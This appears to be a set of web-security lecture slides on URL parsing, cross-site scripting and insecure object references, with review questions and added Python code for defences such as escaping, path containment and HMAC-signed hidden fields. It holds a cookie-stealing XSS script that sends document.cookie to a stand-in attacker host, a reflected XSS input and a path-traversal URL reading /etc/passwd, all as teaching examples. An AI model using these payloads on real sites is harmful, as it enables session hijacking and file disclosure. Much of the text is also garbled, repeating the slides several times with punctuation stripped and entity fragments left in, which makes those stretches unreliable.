- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?
XSS
- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?
Object references
- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts
- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley, 2004
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press, 2012 (Recommended)
as well as the named RFCs.
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Server port
:8080
A decimal number preceded by a colon.
Usually omitted: the default port number for the protocol is then used
- e.g. 80 for HTTP, 443 for HTTPS, 21 for FTP
- sometimes running servers on non-standard ports is useful
Question: What threats might this lead to?
Hierarchical file path
/path/to/resource
- A Unix-style path. Must resolve the . and .. segments
- Relative paths allow for non-fully-qualified URLs
- old style apps:
  - direct connection with the file system
  - resource = HTML file served by the server
- modern apps:
  - very indirect
  - complicated URL rewriting, dynamic content
  - paths mapped to parts of programs or a database
  - server may be embedded in the app
Question: What implications does this have for reviewing the security of web apps?
Query string
?search=purple+bananas
Optional; intended to pass arbitrary parameters to the resource. The commonly used syntax
name1=value1&name2=value2
is not part of the URL syntax: it belongs to HTML forms (and related mail conventions), not to RFC 3986. So:
- the server may not presume or enforce that query string format
- web applications may legally use other forms after the ?
Fragment identifier
#lastsection
- Interpretation depends on the client and the resource type
- in practice: anchor names in HTML elements
- Not intended to be sent to the server
- Recent use: store client-side state while browsing
  - can be changed without a page reload
  - easily bookmarked, shared
  - e.g. map locations
Metacharacters
- Some punctuation characters are reserved as delimiters and cannot appear literally inside a component
  - e.g. [ ] $ & ' ( ) =
- These are URL encoded as a percent sign followed by the ASCII code in hex
  - e.g. %2F encodes /, %25 encodes %
The RFC does not fix exactly which characters must be encoded where, and browsers try to interpret as many user inputs as possible.
E.g. browsers accept http://%65xample.%63om and decode the host to example.com.
Moreover, RFCs are not always followed.
Non-ASCII text encodings in URLs
- Original standards did not allow for non-ASCII text
- but clearly desirable for non-English text
- RFC 3492 introduced Punycode to allow a behind-the-scenes DNS lookup
  - DNS lookup: an ASCII label of the form xn--[ASCII part]-[encoded Unicode part]
  - Browser display: the decoded Unicode form
Extension of 38 characters to 100,000 glyphs allowed many homograph attacks
- e.g. a well-known domain name in which 5 characters can be replaced by identical-looking Cyrillic ones
- there are non-slash characters that look like /
- some attacks are not easily prevented by DNS registrars
We have (puny) browser and search engine defences for this. Moral: probably better to stick with ASCII.
Overall consequences
Parsing URLs is more complicated than you imagined
- better to use well-tested libraries than ad hoc code
But for output, want to be very careful
- especially if URLs are made from user (attacker) input
- should canonicalize, then filter, then reformat
- filter especially on the scheme and authority
Eyeballs can easily be fooled when looking at URLs:
http://example.com&gibberish=1234@167772161/
http://example.com\@coredump.cx/
http://example.com;.coredump.cx/
Which server is visited by these URLs?
(In the first, everything before the @ is userinfo, and 167772161 is 10.0.0.1 written as a single decimal integer. In the other two, browsers have differed over how \ and ; are treated in the authority, so the same string can send different users to different servers.)
Examples from The Tangled Web.
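The following is an added example, not code from the slides or from The Tangled Web. It runs the three look-alike URLs above (plus the percent-encoded host from the Metacharacters slide) through Python's urllib parser to show what host an RFC-style parser actually sees, converts the decimal IP literal, and then applies the slide's advice of canonicalize, then filter on scheme and authority, then reformat. The allow-list (example.com) and the strict host grammar are assumptions made for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed inputs: the three look-alike URLs quoted above from The Tangled
# Web, the percent-encoded host from the Metacharacters slide, and one
# ordinary URL that should pass.
TRICK_URLS = [
    "http://example.com&gibberish=1234@167772161/",
    "http://example.com\\@coredump.cx/",
    "http://example.com;.coredump.cx/",
    "http://%65xample.%63om/",
]
GOOD_URL = "HTTPS://Example.COM/docs/?q=1"

# Strict host grammar (an assumption for this example): ASCII letters, digits
# and hyphens in dot-separated labels. Anything else (%, ;, \, @, non-ASCII)
# is rejected rather than "repaired".
HOST_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*\.?$"
)


def host_seen_by_parser(url):
    """Host as a strictly RFC 3986 style parser (urllib) reads it.

    Browsers may disagree: several treat '\\' like '/', ending the authority
    early, so the same string can name two different servers.
    """
    return urlsplit(url).hostname


def decimal_ip_to_dotted(n):
    """167772161 is a legal IPv4 literal: one 32-bit integer in decimal."""
    return str(ipaddress.IPv4Address(n))


def canonical_allowed_url(url, allowed_hosts):
    """Canonicalize, then filter on scheme and authority, then reformat.

    Returns the canonical URL string, or None if the URL must be refused.
    Filtering runs on parsed parts, so a filter on the raw string cannot be
    sidestepped by an encoding the parser would have undone.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        return None
    # Any userinfo is refused outright: 'example.com&gibberish=1234@' is
    # exactly how the first trick URL hides the real host from the eye.
    if parts.username is not None or parts.password is not None:
        return None
    host = (parts.hostname or "").lower()
    if not HOST_RE.match(host):
        return None
    host = host.rstrip(".")
    if host not in allowed_hosts:
        return None
    try:
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if port is not None and port != {"http": 80, "https": 443}[scheme]:
        return None
    # Rebuild from the parsed parts rather than echoing the attacker's
    # bytes; the fragment is client-side only and is dropped.
    return urlunsplit((scheme, host, parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    for u in TRICK_URLS:
        print(f"{u:48} -> parser host: {host_seen_by_parser(u)!r}")
    print("167772161 is", decimal_ip_to_dotted(167772161))
    allowed = {"example.com"}
    for u in TRICK_URLS + [GOOD_URL]:
        print(f"{u:48} -> {canonical_allowed_url(u, allowed)!r}")
```

Note that urllib keeps the %65xample.%63om host undecoded while a browser decodes it to example.com: a string filter that compares host names before canonicalization would pass or fail depending on which parser it happens to agree with, which is why the filter above works on the parsed, normalized authority and rejects anything outside a strict grammar.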
XSS attacks in general
- Attack typically on (another) user of the web app
- Attacker tricks the app into displaying malicious code
  - typically script code
Many possible aims:
- display random images, popup windows
- change page contents, e.g. alter a bank account number
- session hijacking: steal session cookies
Session hijacking with XSS
[Picture from Innocent Code]
Example injected script:
<script>document.location.replace("http://www.badguy.example/steal.php?what=" + document.cookie)</script>
- redirects the victim's browser to the attacker's site, passing the cookie
- might also pass the currently visited web page
- then the attacker's server can issue a redirect back again
Cookies flagged HttpOnly are not exposed through document.cookie, so this particular payload fails against them; the flag does not prevent XSS itself, nor actions the script performs inside the victim's session.
Reflected XSS
Reflected XSS occurs when the injected malicious code isn't stored on the server but is immediately displayed in the visited page. Suppose
http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc
dynamically makes HTML embedding the title directly:
<h1>Man GCC</h1>
An attacker could use this with a malicious input
title=<script>...</script>&program=gcc
which, e.g., steals a cookie.
Exercise: Explain how this attack works in practice.
XSS Solutions
Input processing is tricky: you need to understand the data flow through the app (quoting, encoding, values passed to and from functions, databases, etc.). Hence output filtering.
Plain output: HTML encoding
- Stored data values need to be encoded to represent them in HTML (e.g. < converted to &lt; etc.)
Marked-up output: complex filtering
- Need to work through the tags in the input and rule out risky ones. Scripts may appear in attributes. Flaky.
Marked-up output: DSL
- A better approach: use a dedicated syntax, converted to a restricted subset of HTML
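The following is an added example (not code from the slides, and not the manpage.php script itself, which the lecture only describes). It reproduces the reflected XSS above in a few lines, shows the plain-output fix of HTML-encoding at the point of output, and then implements the DSL approach: a tiny dedicated markup with three constructs is translated into a fixed subset of HTML, with everything else escaped. The request strings and the markup syntax are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed requests for the manpage.php scenario: the normal one from the
# slide and an attacker's crafted title parameter.
NORMAL_QUERY = "title=Man+GCC&program=gcc"
ATTACK_QUERY = "title=<script>alert(document.cookie)</script>&program=gcc"


def title_param(query_string):
    """Pull ?title= out of a query string, as manpage.php would."""
    return parse_qs(query_string, keep_blank_values=True).get("title", [""])[0]


def render_heading_vulnerable(query_string):
    """The slide's bug reproduced: user data pasted straight into HTML."""
    return "<h1>" + title_param(query_string) + "</h1>"


def render_heading_safe(query_string):
    """Plain output: HTML-encode at the point of output. quote=True also
    encodes quotes, which matters as soon as the same value lands inside an
    attribute rather than element text."""
    return "<h1>" + html.escape(title_param(query_string), quote=True) + "</h1>"


# Marked-up output via a dedicated syntax instead of filtering HTML:
# *bold*, _italic_ and [[text|https://url]] are the only constructs. The
# author's text is escaped first, so no raw HTML can ever reach the page;
# one left-to-right pass then turns the restricted syntax into fixed tags,
# and a URL consumed by a link is never re-scanned for *, _ or anything else.
_TOKEN = re.compile(
    r"\[\[([^\]|\n]+)\|(https?://[^\]\s]+)\]\]"  # [[text|https://url]]
    r"|\*([^*\n]+)\*"                            # *bold*
    r"|_([^_\n]+)_"                              # _italic_
)


def _emit(m):
    if m.group(1) is not None:
        # href passed through html.escape: it holds no raw quote, <, > or &,
        # and the pattern pins the scheme to http(s), so javascript: cannot pass.
        return f'<a href="{m.group(2)}">{m.group(1)}</a>'
    if m.group(3) is not None:
        return f"<b>{m.group(3)}</b>"
    return f"<i>{m.group(4)}</i>"


def render_markup(text):
    """Restricted markup -> restricted HTML. Unknown constructs stay literal."""
    return _TOKEN.sub(_emit, html.escape(text, quote=True))


if __name__ == "__main__":
    print(render_heading_vulnerable(ATTACK_QUERY))
    print(render_heading_safe(ATTACK_QUERY))
    print(render_markup("See *the manual* at [[docs|https://example.com/a_b?x=1&y=2]] <script>x</script>"))
```

The DSL route is the one the slide calls "better" because the decision is a whitelist of syntax, not a blacklist of tags and attributes: a new HTML feature or a parser quirk cannot enlarge what the converter emits.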
Embarrassing PHP blunders
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction
A "cool" PHP script, showhtml.php:
- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to the wrapped version
Then:
http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%2Fpasswd
- remote users can read any file the web server process can read
- the mistake motivates defence-in-depth:
  - the HTTP server should not serve up arbitrary files
  - use internal web server config (separate apps)
  - and external OS config (e.g. nobody user, chroot)
Authorization and object access
What was the problem here?
- the app developer (implicitly) authorized users to read the documentation files he had created
- the project was open source: no need for logins
- the app contained no paths to files outside the project
- so no explicit authorization code was written
- but the PHP code didn't check the filename it received
- showhtml.php provided access to server objects
- input validation only checked for file existence
There should have been a re-authorization step. A well-written app should only allow access to its own resources.
Looking at anyone's bank account
<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>
The account number is an object reference supplied by the client; unless the server re-checks ownership, changing the value in the request shows whichever account it names.
Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account". A genius, clearly.
Solutions for object referencing
Re-validate
- Check authorization again (does this user own this account? is this file inside the project?)
- Obvious solution, but duplicates effort
Add a data indirection
- Session-specific server-side array of account numbers; the client only ever sees the index
<option value="1">12345678901</option>
<option value="2">12346543210</option>
- Similarly for file access:
http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction
- for many files, a hash table or database could be used
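The following is an added example covering both the showhtml.php blunder and the two solutions just listed; it is not the lecture's or the original script's code. Re-validation is shown as a path containment check that canonicalizes the requested file before asking whether it lies under the documentation root (the original checked existence only, which is why /etc/passwd passed). Data indirection is shown as a per-session map that hands the browser small indices and resolves only those it issued. The root directory /srv/docs and the account numbers are assumptions taken from or made for the example.

```python
import html
import os

DOC_ROOT = "/srv/docs"  # assumed location of the project's own HTML files


def resolve_doc_path(root, requested):
    """Re-validate: canonicalize the requested file and keep it inside root.

    Returns the absolute path, or None if the request escapes the
    documentation tree. Containment is decided before any existence check;
    the slide's script did it the other way round and served /etc/passwd.
    """
    root = os.path.realpath(root)
    # os.path.join discards root when 'requested' is absolute, so a request
    # for '/etc/passwd' stays '/etc/passwd' here and is caught below; '..'
    # segments are folded by realpath before the comparison.
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


class SessionObjectMap:
    """Data indirection: the browser only ever sees small per-session
    indices; the real account numbers or file names stay on the server."""

    def __init__(self):
        self._objects = []

    def register(self, obj):
        self._objects.append(obj)
        return len(self._objects)  # 1-based, as in the <option value="1"> slide

    def resolve(self, index):
        try:
            i = int(index)
        except (TypeError, ValueError):
            return None
        return self._objects[i - 1] if 1 <= i <= len(self._objects) else None


def account_options_html(session_map, accounts):
    """Emit the <select> options for the user's own accounts via indices."""
    lines = []
    for acct in accounts:
        idx = session_map.register(acct)
        lines.append(f'<option value="{idx}">{html.escape(str(acct))}</option>')
    return "\n".join(lines)


def show_account(session_map, account_param):
    """Handler for show-account: only indices this session issued resolve.
    A real account number typed into the request maps to nothing."""
    return session_map.resolve(account_param)


if __name__ == "__main__":
    for req in ("release/Userman.html", "../../etc/passwd", "/etc/passwd"):
        print(f"{req:24} -> {resolve_doc_path(DOC_ROOT, req)}")
    session = SessionObjectMap()
    print(account_options_html(session, ["12345678901", "12346543210"]))
    print(show_account(session, "2"), show_account(session, "12346543210"))
```

The containment check is the general form of "only allow access to its own resources": it does not try to spot dangerous strings such as "..", it computes where the request would land and compares that with where it is allowed to land. The indirection map removes the decision altogether, at the cost of per-session server state, which is the "duplicates effort" trade-off the slide mentions in reverse.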
Passing too much information
Old flaw: passing unnecessary information to the client and expecting it back unmodified
<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>
Hidden fields are ordinary request parameters: the client can send back any other path in $File$ and any other address in $To$.
Protecting information in server data
Sometimes the server must pass information to the client during the interaction, but must protect it.
Example: editing a wiki page
<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>
Solution: add a MAC constructed with a server-side secret key
<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">
Or could encrypt the pagename (with an authenticated mode: encryption on its own hides the value but does not stop tampering with it).
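The following is an added example of the MAC solution, not code from the slides or from any wiki. It emits the hidden pagename field together with its MAC and verifies the pair on the way back with a constant-time comparison. Two details the slide leaves implicit are made explicit: the MAC input is length-prefixed so that field name, value and session id cannot be shifted into one another, and the session id is bound in so that a MAC issued in one user's form cannot be replayed in another's. The 40-hex-digit value on the slide is the length of an HMAC-SHA1; this example uses HMAC-SHA256, and the key handling is an assumption.

```python
import hashlib
import hmac
import html
import secrets

# Assumed: a per-deployment secret that never leaves the server. In a real
# app it comes from configuration, not from source code.
SERVER_KEY = secrets.token_bytes(32)


def field_mac(key, field_name, value, session_id):
    """HMAC-SHA256 over field name, value and session id.

    Each part is length-prefixed, so ("page", "name") and ("pag", "ename")
    produce different input. Binding the session id means a MAC issued to
    one user cannot be pasted into another user's form.
    """
    h = hmac.new(key, digestmod=hashlib.sha256)
    for part in (field_name, value, session_id):
        data = part.encode("utf-8")
        h.update(len(data).to_bytes(4, "big"))
        h.update(data)
    return h.hexdigest()


def hidden_fields(key, field_name, value, session_id):
    """What the server emits: the value plus its MAC as hidden inputs."""
    mac = field_mac(key, field_name, value, session_id)
    return (
        f'<input type="hidden" name="{field_name}" '
        f'value="{html.escape(value, quote=True)}">\n'
        f'<input type="hidden" name="{field_name}mac" value="{mac}">'
    )


def verify_field(key, field_name, value, session_id, mac):
    """Check a returned value against its MAC in constant time.

    A mismatch means the client edited the value or the MAC, or is not the
    session the pair was issued to. The value is only trusted after this.
    """
    expected = field_mac(key, field_name, value, session_id)
    return hmac.compare_digest(expected, mac)


if __name__ == "__main__":
    sid = "session-42"  # constructed session identifier
    print(hidden_fields(SERVER_KEY, "pagename", "NineteenSixtiesToys", sid))
    mac = field_mac(SERVER_KEY, "pagename", "NineteenSixtiesToys", sid)
    print(verify_field(SERVER_KEY, "pagename", "NineteenSixtiesToys", sid, mac))
    print(verify_field(SERVER_KEY, "pagename", "AdminSettings", sid, mac))
```

hmac.compare_digest is used rather than == so that the time taken to reject a forged MAC does not depend on how many leading characters the forger got right. If the page name itself must be hidden from the client, the right tool is authenticated encryption of the whole value, not a separate encryption step beside the MAC.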
Other authorization mistakes
Assuming requests occur in the proper order
- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before the POST
- only checking authorization on the first step
Authorization by obscurity
- Supposing that because a web page is not linked from the main site, only people who are given the URL will be able to reach it
http://www.myserver.com/secretarea/privatepaper.pdf
Review questions
URLs
- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?
XSS
- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?
Object references
- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.
References
Some commentary and examples were taken from the texts
- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby. Wiley, 2004.
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski. No Starch Press, 2012. (Recommended)
as well as the named RFCs.
Hierarchical file path
pathtoresource
Eacute A Unix-style path Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps
Eacute direct connection with file systemEacute resource=HTML file served by server
Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app
Question What implications does this have forreviewing the security of web apps
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence
There should have been a re-authorization stepA well-written app should only allow access to its ownresources
Looking at anyonersquos bank account
ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt
ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt
ltselectgtltinput type=submit name=show value=Show Accountgt
ltformgt
Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo
A genius clearly
Solutions for object referencingRe-validate
Eacute Check authorization againEacute Obvious solution but duplicates effort
Add a data indirection
Eacute Session-specific server side array of account nos
ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt
Eacute Similarly for file access
httpresearchsiteedacukshowhtmlphpfile=1Introduction
for many files a hash table or database could be used
Passing too much information
Old flaw passing unnecessary information to client andexpecting it back unmodified
ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$
value=templatesfeedbacktxtgtltinput type=hidden name=$To$
value=feedbacksomesiteexamplegtltformgt
Protecting information in server data
Sometimes the server must pass information to theclient during the interaction but must protect it
Example editing a wiki page
ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt
ltformgt
Solution add a MAC constructed with a server-sidesecret key
ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt
Or could encrypt the pagename
Other authorization mistakes
Assuming requests occur in proper order
Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step
Authorization by obscurity
Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it
httpwwwmyservercomsecretareaprivatepaperpdf
Review questionsURLs
Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protectyour users
XSS
Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session
Object references
Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server
References
Some commentary and examples were taken from thetexts
Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004
Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zelewski No Starch Press2012 (Recommended)
as well as the named RFCs
- Overview
- Basics URLs
- Output Filtering and XSS
- Object references
Query string
search=purple+bananas
Optional intended to pass arbitrary parameters toresource Commonly used syntax
name1=value1ampname2=value2
is not part of URL syntax Syntax is related to mailHTML forms So
Eacute server may not presumeenforce query stringformat
Eacute web applications may legally use other forms after
Fragment identifier
lastsection
Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements
Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing
Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations
Metacharacters
Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp rsquo ( ) =
Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes
The RFC does not specify a fixed mapping andbrowsers try to interpret as many user inputs aspossible
Eg examples like http65xample63om
Moreover RFCs are not always followed
Non-ASCII text encodings in URLsEacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow
behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part
Extension of 38 characters to 100000 glyphs allowedmany homograph attacks
Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS
registrars
We have (puny) browser search engine defences forthis Moral probably better to stick with ASCII
Overall consequences
Parsing URLs more complicated than you imagined
Eacute better to use well-tested libraries than ad hoc code
But for output want to be very careful
Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority
Overall consequences
Eyeballs can easily be fooled when looking at URLs
httpexamplecomampgibberish=1234167772161
httpexamplecomcoredumpcx
httpexamplecomcoredumpcx
Which server is visited by these URLs
Examples from The Tangled Web
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
XSS attacks in general
Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code
Eacute typically script code
Many possible aims
Eacute display random images popup windowsEacute change page contents eg alter bank account
numberEacute session hijacking steal session cookies
Session hijacking with XSS
[Picture from Innocent Code
Example injected script
ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)
ltscriptgt
Eacute redirects victimrsquos browser to attackers site passingcookie
Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back
again
Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed inthe visited page Suppose
httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gccgt
dynamically makes HTML embedding title directly
lth1gtMan GCClth1gt
An attacker could use this with a malicious input
title=ltscriptgtltscriptgtprogram=gcc
which eg steals a cookie
Exercise Explain how this attack works in practice
XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering
Plain output HTML encoding
Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)
Marked up output complex filtering
Eacute Need to work through tags in input and rule outrisky ones Scripts may appear in attributes Flaky
Marked up output DSL
Eacute A better approach use a dedicated syntax convertto restricted subset of HTML
Outline
Overview
Basics URLs
Output Filtering and XSS
Object references
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction
A ldquocoolrdquo PHP script showhtmlphp
Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to
wrapped version
Embarrassing PHP blunders
httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd
Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth
Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)
Authorization and object access
What was the problem here
Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written
